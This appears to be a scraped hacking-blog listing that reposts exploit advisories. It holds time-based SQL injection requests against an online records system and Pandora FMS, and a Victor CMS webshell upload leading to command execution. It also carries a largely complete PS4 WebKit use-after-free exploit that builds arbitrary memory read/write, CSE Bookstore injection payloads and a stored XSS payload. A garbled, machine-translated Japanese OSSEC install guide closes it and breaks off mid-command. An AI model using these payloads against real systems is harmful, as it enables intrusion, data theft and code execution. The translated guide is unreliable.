$query->execute(); $results=$query->fetchAll(PDO::FETCH_OBJ); II PROOF OF CONCEPT ======================================================================== ## Request user POST /omrs/user/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884 Content-Length: 320 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/omrs/user/search.php Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2 Upgrade-Insecure-Requests: 1 -----------------------------197361427118054779422510078884 Content-Disposition: form-data; name="searchdata" ' and (select 1 from (select(sleep(5)))a) and 'a'='a -----------------------------197361427118054779422510078884 Content-Disposition: form-data; name="search" -----------------------------197361427118054779422510078884-- ## Request admin POST /omrs/admin/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522 Content-Length: 320 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/omrs/admin/search.php Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2 Upgrade-Insecure-Requests: 1 -----------------------------267799269040335247322746025522 Content-Disposition: form-data; name="searchdata" ' and (select 1 from (select(sleep(5)))a) and 'a'='a -----------------------------267799269040335247322746025522 Content-Disposition: form-data; name="search" -----------------------------267799269040335247322746025522--
  15. HireHackking

    Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) # Date: 12-21-2020 # Exploit Author: Matthew Aberegg, Alex Prieto # Vendor Homepage: https://pandorafms.com/ # Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c # Software Link: https://pandorafms.com/community/get-started/ # Version: Pandora FMS 7.0 NG 750 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS. # Vulnerable Parameter : network_csv # POC POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119 Content-Length: 1597 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 Upgrade-Insecure-Requests: 1 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_manual_defined" 1 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_select" 300 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_text" 0 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval" 0 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_units" 1 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="taskname" test -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="id_recon_server" 3 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="network_csv_enabled" on -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="network_csv"; filename="test.txt" Content-Type: text/plain ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="network" -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="comment" test -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="submit" Next -----------------------------308827614039434535382911921119--
  16. HireHackking

    Victor CMS 1.0 - File Upload To RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Victor CMS 1.0 - File Upload To RCE # Date: 20.12.2020 # Exploit Author: Mosaaed # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Apache2/Linux Step1: register http://localhost/CMSsite-master/register.php step2: login as user step3: Go to Profile step4: upload imag as php file (upload shell.php) step5: update user step6: You will find your shell in img folder :/path/img/cmd.php http://localhost/CMSsite-master/img/cmd.php?cmd=id uid=33(www-data) gid=33(www-data) groups=33(www-data)
  17. HireHackking

    Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)

    HireHackking posted a blog entry in Hacker Technology
    const OFFSET_ELEMENT_REFCOUNT = 0x10; const OFFSET_JSAB_VIEW_VECTOR = 0x10; const OFFSET_JSAB_VIEW_LENGTH = 0x18; const OFFSET_LENGTH_STRINGIMPL = 0x04; const OFFSET_HTMLELEMENT_REFCOUNT = 0x14; const LENGTH_ARRAYBUFFER = 0x8; const LENGTH_STRINGIMPL = 0x14; const LENGTH_JSVIEW = 0x20; const LENGTH_VALIDATION_MESSAGE = 0x30; const LENGTH_TIMER = 0x48; const LENGTH_HTMLTEXTAREA = 0xd8; const SPRAY_ELEM_SIZE = 0x6000; const SPRAY_STRINGIMPL = 0x1000; const NB_FRAMES = 0xfa0; const NB_REUSE = 0x8000; var g_arr_ab_1 = []; var g_arr_ab_2 = []; var g_arr_ab_3 = []; var g_frames = []; var g_relative_read = null; var g_relative_rw = null; var g_ab_slave = null; var g_ab_index = null; var g_timer_leak = null; var g_jsview_leak = null; var g_jsview_butterfly = null; var g_message_heading_leak = null; var g_message_body_leak = null; var g_obj_str = {}; var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px"; var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px"; var g_round = 1; var g_input = null; var guess_htmltextarea_addr = new Int64("0x2031b00d8"); var master_b = new Uint32Array(2); var slave_b = new Uint32Array(2); var slave_addr; var slave_buf_addr; var master_addr; /* Executed after deleteBubbleTree */ function setupRW() { /* Now the m_length of the JSArrayBufferView should be 0xffffff01 */ for (let i = 0; i < g_arr_ab_3.length; i++) { if (g_arr_ab_3[i].length > 0xff) { g_relative_rw = g_arr_ab_3[i]; debug_log("[+] Succesfully got a relative R/W"); break; } } if (g_relative_rw === null) die("[!] Failed to setup a relative R/W primitive"); debug_log("[+] Setting up arbitrary R/W"); /* Retrieving the ArrayBuffer address using the relative read */ let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1; let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR)); /* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */ let ab_index = g_jsview_leak.sub(ab_addr).low32(); if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER) g_ab_index = ab_index + LENGTH_JSVIEW; else g_ab_index = ab_index - LENGTH_JSVIEW; /* Overding the length of one JSArrayBufferView with a known value */ g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41; /* Looking for the slave JSArrayBufferView */ for (let i = 0; i < g_arr_ab_3.length; i++) { if (g_arr_ab_3[i].length === 0x41) { g_ab_slave = g_arr_ab_3[i]; g_arr_ab_3 = null; break; } } if (g_ab_slave === null) die("[!] Didn't found the slave JSArrayBufferView"); /* Extending the JSArrayBufferView length */ g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff; debug_log("[+] Testing arbitrary R/W"); let saved_vtable = read64(guess_htmltextarea_addr); write64(guess_htmltextarea_addr, new Int64("0x4141414141414141")); if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141")) die("[!] Failed to setup arbitrary R/W primitive"); debug_log("[+] Succesfully got arbitrary R/W!"); /* Restore the overidden vtable pointer */ write64(guess_htmltextarea_addr, saved_vtable); /* Cleanup memory */ cleanup(); /* Set up addrof/fakeobj primitives */ g_ab_slave.leakme = 0x1337; var bf = 0; for(var i = 15; i >= 8; i--) bf = 256 * bf + g_relative_rw[g_ab_index + i]; g_jsview_butterfly = new Int64(bf); if(!read64(g_jsview_butterfly.sub(16)).equals(new Int64("0xffff000000001337"))) die("[!] Failed to setup addrof/fakeobj primitives"); debug_log("[+] Succesfully got addrof/fakeobj"); /* Getting code execution */ /* ... */ var leak_slave = addrof(slave_b); var slave_addr = read64(leak_slave.add(0x10)); og_slave_addr = new int64(slave_addr.low32(), slave_addr.hi32()); var leak_master = addrof(master_b); write64(leak_master.add(0x10), leak_slave.add(0x10)); var prim = { write8: function(addr, val) { master_b[0] = addr.low; master_b[1] = addr.hi; if(val instanceof int64) { slave_b[0] = val.low; slave_b[1] = val.hi; } else { slave_b[0] = val; slave_b[1] = 0; } master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; }, write4: function(addr, val) { master_b[0] = addr.low; master_b[1] = addr.hi; slave_b[0] = val; master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; }, read8: function(addr) { master_b[0] = addr.low; master_b[1] = addr.hi; var r = new int64(slave_b[0], slave_b[1]); master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; return r; }, read4: function(addr) { master_b[0] = addr.low; master_b[1] = addr.hi; var r = slave_b[0]; master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; return r; }, leakval: function(val) { g_ab_slave.leakme = val; master_b[0] = g_jsview_butterfly.low32() - 0x10; master_b[1] = g_jsview_butterfly.hi32(); var r = new int64(slave_b[0], slave_b[1]); master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; return r; }, }; window.prim = prim; setTimeout(stage2, 1000); } function read(addr, length) { for (let i = 0; i < 8; i++) g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i); let arr = []; for (let i = 0; i < length; i++) arr.push(g_ab_slave[i]); return arr; } function read64(addr) { return new Int64(read(addr, 8)); } function write(addr, data) { for (let i = 0; i < 8; i++) g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i); for (let i = 0; i < data.length; i++) g_ab_slave[i] = data[i]; } function write64(addr, data) { write(addr, data.bytes()); } function addrof(obj) { g_ab_slave.leakme = obj; return read64(g_jsview_butterfly.sub(16)); } function fakeobj(addr) { write64(g_jsview_butterfly.sub(16), addr); return g_ab_slave.leakme; } function cleanup() { select1.remove(); select1 = null; input1.remove(); input1 = null; input2.remove(); input2 = null; input3.remove(); input3 = null; div1.remove(); div1 = null; g_input = null; g_rows1 = null; g_rows2 = null; g_frames = null; } /* * Executed after buildBubbleTree * and before deleteBubbleTree */ function confuseTargetObjRound2() { if (findTargetObj() === false) die("[!] Failed to reuse target obj."); g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble(); setTimeout(setupRW, 6000); } /* Executed after deleteBubbleTree */ function leakJSC() { debug_log("[+] Looking for the smashed StringImpl..."); var arr_str = Object.getOwnPropertyNames(g_obj_str); /* Looking for the smashed string */ for (let i = arr_str.length - 1; i > 0; i--) { if (arr_str[i].length > 0xff) { debug_log("[+] StringImpl corrupted successfully"); g_relative_read = arr_str[i]; g_obj_str = null; break; } } if (g_relative_read === null) die("[!] Failed to setup a relative read primitive"); debug_log("[+] Got a relative read"); var tmp_spray = {}; for(var i = 0; i < 100000; i++) tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + (''+i).padStart(5, '0')] = 0x1337; let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER); /* Spraying JSView */ let tmp = []; for (let i = 0; i < 0x10000; i++) { /* The last allocated are more likely to be allocated after our relative read */ if (i >= 0xfc00) g_arr_ab_3.push(new Uint8Array(ab)); else tmp.push(new Uint8Array(ab)); } tmp = null; /* * Force JSC ref on FastMalloc Heap * https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151 */ var props = []; for (var i = 0; i < 0x400; i++) { props.push({ value: 0x42424242 }); props.push({ value: g_arr_ab_3[i] }); } /* * /!\ * This part must avoid as much as possible fastMalloc allocation * to avoid re-using the targeted object * /!\ */ /* Use relative read to find our JSC obj */ /* We want a JSView that is allocated after our relative read */ while (g_jsview_leak === null) { Object.defineProperties({}, props); for (let i = 0; i < 0x800000; i++) { var v = undefined; if (g_relative_read.charCodeAt(i) === 0x42 && g_relative_read.charCodeAt(i + 0x01) === 0x42 && g_relative_read.charCodeAt(i + 0x02) === 0x42 && g_relative_read.charCodeAt(i + 0x03) === 0x42) { if (g_relative_read.charCodeAt(i + 0x08) === 0x00 && g_relative_read.charCodeAt(i + 0x0f) === 0x00 && g_relative_read.charCodeAt(i + 0x10) === 0x00 && g_relative_read.charCodeAt(i + 0x17) === 0x00 && g_relative_read.charCodeAt(i + 0x18) === 0x0e && g_relative_read.charCodeAt(i + 0x1f) === 0x00 && g_relative_read.charCodeAt(i + 0x28) === 0x00 && g_relative_read.charCodeAt(i + 0x2f) === 0x00 && g_relative_read.charCodeAt(i + 0x30) === 0x00 && g_relative_read.charCodeAt(i + 0x37) === 0x00 && g_relative_read.charCodeAt(i + 0x38) === 0x0e && g_relative_read.charCodeAt(i + 0x3f) === 0x00) v = new Int64(str2array(g_relative_read, 8, i + 0x20)); else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 && g_relative_read.charCodeAt(i + 0x11) === 0x42 && g_relative_read.charCodeAt(i + 0x12) === 0x42 && g_relative_read.charCodeAt(i + 0x13) === 0x42) v = new Int64(str2array(g_relative_read, 8, i + 8)); } if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) { g_jsview_leak = v; props = null; break; } } } /* * /!\ * Critical part ended-up here * /!\ */ debug_log("[+] JSArrayBufferView: " + g_jsview_leak); /* Run the exploit again */ prepareUAF(); } /* * Executed after buildBubbleTree * and before deleteBubbleTree */ function confuseTargetObjRound1() { /* Force allocation of StringImpl obj. beyond Timer address */ sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2); /* Checking for leaked data */ if (findTargetObj() === false) die("[!] Failed to reuse target obj."); dumpTargetObj(); g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble(); /* * The timeout must be > 5s because deleteBubbleTree is scheduled to run in * the next 5s */ setTimeout(leakJSC, 6000); } function handle2() { /* focus elsewhere */ input2.focus(); } function reuseTargetObj() { /* Delete ValidationMessage instance */ document.body.appendChild(g_input); /* * Free ValidationMessage neighboors. * SmallLine is freed -> SmallPage is cached */ for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++) g_frames[i].setAttribute("rows", ','); /* Get back target object */ for (let i = 0; i < NB_REUSE; i++) { let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE); let view = new Float64Array(ab); view[0] = guess_htmltextarea_addr.asDouble(); // m_element view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble g_arr_ab_1.push(view); } if (g_round == 1) { /* * Spray a couple of StringImpl obj. prior to Timer allocation * This will force Timer allocation on same SmallPage as our Strings */ sprayStringImpl(0, SPRAY_STRINGIMPL); g_frames = []; g_round += 1; g_input = input3; setTimeout(confuseTargetObjRound1, 10); } else { setTimeout(confuseTargetObjRound2, 10); } } function dumpTargetObj() { debug_log("[+] m_timer: " + g_timer_leak); debug_log("[+] m_messageHeading: " + g_message_heading_leak); debug_log("[+] m_messageBody: " + g_message_body_leak); } function findTargetObj() { for (let i = 0; i < g_arr_ab_1.length; i++) { if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) { debug_log("[+] Found fake ValidationMessage"); if (g_round === 2) { g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]); g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]); g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]); g_round++; } g_fake_validation_message = g_arr_ab_1[i]; g_arr_ab_1 = []; return true; } } return false; } function prepareUAF() { g_input.setCustomValidity("ps4"); for (let i = 0; i < NB_FRAMES; i++) { var element = document.createElement("frameset"); g_frames.push(element); } g_input.reportValidity(); var div = document.createElement("div"); document.body.appendChild(div); div.appendChild(g_input); /* First half spray */ for (let i = 0; i < NB_FRAMES / 2; i++) g_frames[i].setAttribute("rows", g_rows1); /* Instantiate target obj */ g_input.reportValidity(); /* ... and the second half */ for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++) g_frames[i].setAttribute("rows", g_rows2); g_input.setAttribute("onfocus", "reuseTargetObj()"); g_input.autofocus = true; } /* HTMLElement spray */ function sprayHTMLTextArea() { debug_log("[+] Spraying HTMLTextareaElement ..."); let textarea_div_elem = document.createElement("div"); document.body.appendChild(textarea_div_elem); textarea_div_elem.id = "div1"; var element = document.createElement("textarea"); /* Add a style to avoid textarea display */ element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;'; /* * This spray is not perfect, "element.cloneNode" will trigger a fastMalloc * allocation of the node attributes and an IsoHeap allocation of the * Element. The virtual page layout will look something like that: * [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...] */ for (let i = 0; i < SPRAY_ELEM_SIZE; i++) textarea_div_elem.appendChild(element.cloneNode()); } /* StringImpl Spray */ function sprayStringImpl(start, end) { for (let i = start; i < end; i++) { let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0")); g_obj_str[s] = 0x1337; } } function go() { /* Init spray */ sprayHTMLTextArea(); g_input = input1; /* Shape heap layout for obj. reuse */ prepareUAF(); }
  18. HireHackking

    CSE Bookstore 1.0 - Multiple SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection # Date : 2020-12-21 # Author : Musyoka Ian # Version : CSE Bookstore 1.0 # Vendor Homepage: https://projectworlds.in/ # Platform : PHP # Tested on : Debian CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on Below is results returned by SQLMap Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT POC 1 REQUEST ======== GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 Host: 192.168.196.83 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n Upgrade-Insecure-Requests: 1 RESPONSE ======== HTTP/1.1 200 OK Date: Mon, 21 Dec 2020 20:09:49 GMT Server: Apache/2.4.38 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 172 Connection: close Content-Type: text/html; charset=UTF-8 Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1 POC 2 Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter REQUEST ======= POST /ebook/cart.php HTTP/1.1 Host: 192.168.196.83 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4 Content-Type: application/x-www-form-urlencoded Content-Length: 57 Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9 bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart RESPONSE ======= get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1 POC 3. Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials REQUEST ======= GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1 Host: 192.168.196.83 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.196.83/ebook/books.php Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on RESPONSE ======== HTTP/1.1 200 OK Date: Mon, 21 Dec 2020 20:47:58 GMT Server: Apache/2.4.38 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 188 Connection: close Content-Type: text/html; charset=UTF-8 Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1
  19. HireHackking

    Library Management System 3.0 - "Add Category" Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-22 # Google Dork: N/A # Vendor Homepage: https://otsglobal.org/ # Software Link: https://codecanyon.net/item/library-management-system-22/16965307 # Affected Version: 3.0 # Patched Version: Unpatched # Category: Web Application # Tested on: Kali Linux Step 1. Login as Admin. Step 2. Select "Book" from menu and select "Categories" from sub menu and after that click on "Add Category". Step 3. Insert payload - "><img src onerror=alert(1)> in "Category Name" Step 4. Now Click on "Save" , Go to "Category" and See last , there you will get alert box.
  20. HireHackking

    タイトル:centos7にOSSECをインストールします

    HireHackking posted a blog entry in Hacker Technology
    1。序文 OSSECは、オープンソースのホストベースの侵入検知システムであり、略してHIDと呼ぶことができます。ログ分析、ファイルの整合性チェック、ポリシー監視、ルートキット検出、リアルタイムアラーム、リンケージ応答などの機能があります。 Linux、Windows、MacOS、Solaris、HP-ux、AIXの複数のオペレーティングシステムをサポートしています。企業のセキュリティのための強力なツールです。 Zabbixと同様のS/Cランニングモード OSSECは、3種類のロギング、アラートロギング、ファイアウォールロギング、イベント(アーカイブ)ロギングをサポートしています サーバーはudp514(rsyslog)、udp1514(ossec-remoted)ポート監視を開き、クライアントはリアルタイムステータスデータをサーバーに送信します Integrated fail2ban、iptablesフィルタリング、エラーログ分析 詳細な紹介とドキュメントについては、公式ウェブサイトを参照してください:http://www.ossec.net/ 2。システム環境 サーバー: コンピューター名:Ossec-Server IPアドレス:172.16.91.130 OS: CENTOS7.0 クライアント1: コンピューター名:Agent-Linux IPアドレス:172.16.91.131 OS:UBUNUT14.04 クライアント2: コンピューター名:Agent-Win7 IPアドレス:172.16.91.143 OS:WIN7X86 3。 OSSECサーバーのインストール yumソースのインストールと構成 1。Centosの下でYumフォルダーを入力します [root@localhost] #cd /etc/yum.repos.d/ 2。WGETを使用して、レポファイルをダウンロードします wget http://mirrors.aliyun.com/repo/centos-7.repo WGETコマンドが有効になっていない場合、WGETツールがまだインストールされていないことを意味します。 yum -yを入力して、wgetをインストールしてインストールします。現在のディレクトリは/etc/yum.repos.d/であり、私がダウンロードしたばかりのCentos-7.repoはこのディレクトリにもあります [root@localhost]#yum -yインストールwget [root@localhost]# wget http://mirrors.aliyun.com/repo/centos-7.repo 3。システムの元のレポファイルをバックアップします [root@localhost]#mv centos-base.repocentos-base.bak.repo #ITはCentos-base.repo-centos-base.repo.bakの名前を変更することを意味します 4.システムの元のレポファイルを交換します MV CENTOS-7.REPOCENTOS-BASE.REPO #ITは、Centos-7.Repo-Centos-Base.Repoの名前を変更することを意味します [root@localhost]#mv centos-7.repo centos-base.repo 5。Yumソースアップデートコマンドを実行します [root@localhost]# ヤムはすべてをきれいにします [root@localhost]# Yum Makecache [root@localhost]# YUMアップデート ファイアウォールを閉じます [root@localhost 〜]#cat/etc/selinux/config # このファイルは、システム上のSELINUXの状態を制御します。 # Selinux=これら3つの値のいずれかを取得できます3: #施行-Selinuxセキュリティポリシーはです 強制。 #許容- Selinuxが警告を印刷します 強制する代わりに。 #無効-Selinuxポリシーはロードされていません。 selinux=disabled # selinuxType=3つの値のうち3つのうち:のいずれかを取得できます #ターゲット - ターゲットプロセスはです 保護された、 #最小- ターゲットポリシーの変更。 選択されたプロセスのみが保護されています。 #MLS-マルチレベルのセキュリティ保護。 selinuxType=ターゲット 閉じるファイアウォール: Systemctl stop firewalld.service #stop firewall SystemCtl Disabled firewalld.service #disable firewallブート mysqlのインストールと構成 1。MySQLのYumソースのRPMパッケージをダウンロード [root@localhost] 〜]# wgethttp://Repo.mysql.com/mysql57-community-release-el7.rpm 2。rpmファイルをインストールし、コマンドを介してmysqlのyumソースをインストールします。 [root@localhost] 〜]#rpm -ivh mysql57-community-release-el7.rpm 3。YumはMySQLとLIBプラグインをインストールします [root@localhost] 〜]#yum install -y mysql -server [root@localhost] 〜]#yum -yマリアドブサーバーmariadb mariadb-develをインストールします 4。MySQLを開始します [root@localhost] 〜] #SystemCtl MySQLDを開始します 5。スタートアップのセットアップ: [root@localhost] 〜] #systemctlを有効にしますmysqld 6. mysqlの一時的なパスワード情報を取得します [root@localhost] 〜] #grep '一時的なパスワード' /var/log/mysqld.log 7。 MySQLパスワードポリシーを設定します [root@localhost] 〜] #mysql -uroot –P mysql Global validate_password_policy=0を設定します。 mysqlset Global Validate_password_length=1; 8。ルートアカウントがログインできるように設定します mysql 「roothost」で識別されたユーザー「ルート」@'localhost'を変更します。 7.他のマシンにログインすることを許可します 8. mysqlにユーザーoseecを追加して、挿入、追加、削除などのアクセス許可があります。 mysql -uroot -P MySQLはデータベースOSSECを作成します。 mysql grant insert、select、update、create、削除、ossec。* to ossec@localhost 'ossec'によって識別されました。 MySQLフラッシュ特権。 mysql \ q 9.データベースを作成して、以下のインストール構成を容易にし、マシンのmysqに接続します [root@localhost] 〜] #mysql -uroot -P mysql データベースOSSECを作成します。 管理ライブラリとセドメールとPHPソフトウェアのインストール 1.最初に、使用する必要がある関連するライブラリとソフトウェアをインストールします。最終的に分析のためにログをMySQLにインポートする必要があり、Webプログラムを通じてアラーム結果を表示する必要があるため、ローカルマシンをSMTPとして扱う必要があるため、MySQL、Apache、Sendmailサービスをローカルマシンにインストールする必要があります。現在の端末で次のコマンドを実行します [root@localhost] 〜]#yum install wget gcc make httpd php php-mysql sendmail 2。HTTPDサービスを開始してステータスを表示し、ランダム開始を設定します [root@localhost] 〜] #SystemCtl Start HTTPD #Start HTTPDサービス [root@localhost] 〜] #SystemCtlステータスhttpd.Service #View HTTPDサーバー [root@localhost] 〜] #systemctl enable httpd #set起動 3. sendmailサービスを開始してステータスを表示し、ランダムスタートを設定します [root@localhost] 〜] #SystemCtl Start sendmail.service #set Sedmailを開始します [root@localhost] 〜] #SystemCTLステータスSENDMAIL.SERVICE #View SedMail Status [root@localhost] 〜] #SystemCtl enable sendmail.service #set startup OSSECサーバー側のインストールと構成 1。WGETからOSSECインストールパッケージをダウンロードします [root@localhost] 〜]# wget https://bintray.com/artifact/download/ossec/ossec-hids/ossec-hids-2.8.3.tar.gz 2。OSSECインストールディレクトリを入力します [root@localhost〜] #cd ossec-hids-2.9.3/ 3。OSSECをサポートするには、次のように、インストール前にmake setDBコマンドを実行する必要があります [root@localhost] 〜] #CD SRC [root@localhost] 〜] #setdbを作成します MySQLが正常にサポートできることを示すために、次の情報を見ました。 info: MySQLサポートが編集されています。 4. OSSECサーバーをインストールします [root@localhost] Ossec-hids-2.8.3]#./install.sh which:ホストはありません(/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/sbin:/us 